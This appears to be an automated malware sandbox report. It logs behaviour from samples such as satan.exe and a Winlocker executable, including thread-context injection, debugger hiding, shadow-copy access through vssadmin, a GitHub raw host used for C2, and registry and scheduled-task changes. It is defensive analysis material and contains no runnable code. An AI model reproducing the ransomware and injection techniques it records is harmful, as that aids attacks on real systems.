File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\S:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\B:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\E:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\P:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\Y:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\I:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\Q:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\U:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\J:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\T:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\Z:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\O:	WinlockerVB6Blacksod.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

108 raw.githubusercontent.com
109 raw.githubusercontent.com

flow	ioc
108	raw.githubusercontent.com
109	raw.githubusercontent.com

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

Processes:

Explorer.EXEefku.exeDllHost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exe

pid	process
3448	Explorer.EXE
3448	Explorer.EXE
3448	Explorer.EXE
3448	Explorer.EXE
456	efku.exe
456	efku.exe
456	efku.exe
456	efku.exe
456	efku.exe
4056	DllHost.exe
4056	DllHost.exe
4056	DllHost.exe
4056	DllHost.exe
116	Conhost.exe
116	Conhost.exe
116	Conhost.exe
116	Conhost.exe
1360	Conhost.exe
1360	Conhost.exe
1360	Conhost.exe
1360	Conhost.exe
2360	Conhost.exe
2360	Conhost.exe
2360	Conhost.exe
2360	Conhost.exe
3732	Conhost.exe
3732	Conhost.exe
3732	Conhost.exe
3732	Conhost.exe
4932	Conhost.exe
4932	Conhost.exe
4932	Conhost.exe
4932	Conhost.exe
3788	Conhost.exe
3788	Conhost.exe
3788	Conhost.exe
3788	Conhost.exe
4976	Conhost.exe
4976	Conhost.exe
4976	Conhost.exe
4976	Conhost.exe
3732	Conhost.exe
3732	Conhost.exe
3732	Conhost.exe
3732	Conhost.exe
1104	Conhost.exe
1104	Conhost.exe
1104	Conhost.exe
1104	Conhost.exe
3352	Conhost.exe
3352	Conhost.exe
2340	Conhost.exe
3352	Conhost.exe
2340	Conhost.exe
2340	Conhost.exe
3352	Conhost.exe
2340	Conhost.exe
4608
4608
4608
4608
1328	Conhost.exe
1328	Conhost.exe
1328	Conhost.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

satan.exeefku.exesatan.exexyigo.exesatan.exeviwa.exesatan.exeandu.exe

description	pid	process	target process
PID 3420 set thread context of 4504	3420	satan.exe	satan.exe
PID 1028 set thread context of 456	1028	efku.exe	efku.exe
PID 2064 set thread context of 4864	2064	satan.exe	satan.exe
PID 1268 set thread context of 3420	1268	xyigo.exe	xyigo.exe
PID 4816 set thread context of 4864	4816	satan.exe	satan.exe
PID 720 set thread context of 4188	720	viwa.exe	viwa.exe
PID 1228 set thread context of 4296	1228	satan.exe	satan.exe
PID 3080 set thread context of 4476	3080	andu.exe	andu.exe

Drops file in Program Files directory 2 IoCs

Processes:

msiexec.exe

description	ioc	process
File created	C:\Program Files (x86)\Windows\Error file remover\Windows Logoff Sound.wav	msiexec.exe
File created	C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe	msiexec.exe

Drops file in Windows directory 21 IoCs

Processes:

msiexec.exeMsiExec.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\MSI2A75.tmp	msiexec.exe
File created	C:\Windows\Tasks\sys.job	MsiExec.exe
File opened for modification	C:\Windows\Installer\MSI2968.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI29B7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2A07.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2918.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C452D4E2-DE24-48B6-B5C3-ACB240A01606}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2AE5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2B73.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e5d27de.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI284B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2C20.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2CDC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2948.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2A86.tmp	msiexec.exe
File created	C:\Windows\Installer\e5d27de.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI28AA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2AA6.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4508	1108	WerFault.exe	Xyeta.exe
784	5100	WerFault.exe	Xyeta.exe
768	412	WerFault.exe	Xyeta.exe
4728	4340	WerFault.exe	Xyeta.exe
5788	6080

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

4952 vssadmin.exe

pid	process
4952	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE

Modifies data under HKEY_USERS 3 IoCs

Processes:

msiexec.exe

description	ioc	process
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b	msiexec.exe

Modifies registry class 64 IoCs

Processes:

Explorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe11000000889cbf0a2792da01f587b9509ca0da01f587b9509ca0da0114000000	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Rev = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f80cb859f6720028040b29b5540cc05aab60000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	Explorer.EXE

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

Processes:

pid	process
4180	reg.exe
2596	reg.exe
5808
3200	reg.exe
3236	reg.exe
2360	reg.exe
2664	reg.exe
4324	reg.exe
5376
300	reg.exe
3108	reg.exe
2428	reg.exe
3940	reg.exe
1148	reg.exe
2972	reg.exe
6036	reg.exe
5848
4056	reg.exe
888	reg.exe
3788	reg.exe
5556
3180	reg.exe
1640
5776
1508	reg.exe
1692	reg.exe
2032	reg.exe
5440	reg.exe
208	reg.exe
4492
268
5584
3100
2016	reg.exe
2980	reg.exe
5824
4028
4860	reg.exe
5720	reg.exe
5984
5184
5412
3140	reg.exe
1128	reg.exe
5136	reg.exe
5712
6068
1548	reg.exe
4808	reg.exe
5440
1848	reg.exe
5268	reg.exe
4464
5520
3024	reg.exe
3988	reg.exe
2900	reg.exe
3108	reg.exe
5864
3472	reg.exe
4264	reg.exe
5668	reg.exe
4352	reg.exe
1656	reg.exe

NTFS ADS 9 IoCs

Processes:

msedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 124993.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 989410.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 444495.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 365590.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 280016.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 598467.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 785139.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 667395.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 721000.crdownload:SmartScreen	msedge.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

Explorer.EXE

pid process

3448 Explorer.EXE
3448 Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exesatan.exe

pid	process
2352	msedge.exe
2352	msedge.exe
2252	msedge.exe
2252	msedge.exe
4784	identity_helper.exe
4784	identity_helper.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
1584	msedge.exe
1584	msedge.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe
3420	satan.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3448 Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

Processes:

msedge.exe

pid	process
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

vssvc.exeExplorer.EXE

description	pid	process
Token: SeBackupPrivilege	3028	vssvc.exe
Token: SeRestorePrivilege	3028	vssvc.exe
Token: SeAuditPrivilege	3028	vssvc.exe
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
